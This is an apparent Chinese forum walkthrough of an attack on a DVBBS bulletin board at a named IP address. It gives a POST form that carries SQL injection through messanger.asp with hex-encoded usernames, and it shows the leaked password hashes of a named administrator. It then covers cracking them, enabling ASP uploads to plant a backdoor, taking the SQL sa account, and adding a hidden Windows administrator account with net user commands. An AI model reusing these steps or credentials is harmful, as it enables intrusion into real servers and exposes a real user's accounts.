第一步:用注册好的用户名登陆,登陆时选择保存cookie,撰写短消息,保存<br>
第二步:利用下边网页提交信息<br>
<form action=http://61.156.35.167/bbs/messanger.asp?action=删除草稿 method=post><br>
<input type=text name=id width=32><br>
<input type=submit><br>
</form><br>
username使用SQL Encoder编码,这里我们用一个管理员的名字radiofly<br>
提交<br>
select userpassword from [user] where username=0x72006100640069006f0066006c007900 and userpassword>7<br>
得到<br>
Microsoft VBScript 编译器错误 错误 '800a03f6' <br>
<br>
缺少 'End' <br>
<br>
/iisHelp/common/500-100.asp，行242 <br>
<br>
Microsoft OLE DB Provider for SQL Server 错误 '80040e07' <br>
<br>
将 nvarchar 值 '78e4ea2181b00d21' 转换为数据类型为 int 的列时发生语法错误。 <br>
<br>
/bbs/messanger.asp，行619 <br>
<br>
78e4ea2181b00d21就是radiofly的前台密码<br>
<br>
提交<br>
select password from admin where username=0x72006100640069006f0066006c007900 and password>7<br>
得到后台密码 acaa91f51ed197c7<br>
<br>
用dvbbs密码猜解工具猜解密码 等待 等待 再等待。。。。。。Ok<br>
得到密码后登陆进入后台,修改文件上传类型,添加asp类型,上传asp后门<br>
得到sql数据库的sa密码,使用sqlexec连接<br>
net user admin$ xiaoxue /add<br>
net localgroup administrators admin$ /add<br>
<br>
到此 over :)<br>
by 小路 爱国者安全网提醒您：
动画内附广告纯属个人宣传，网络交易，风险自担。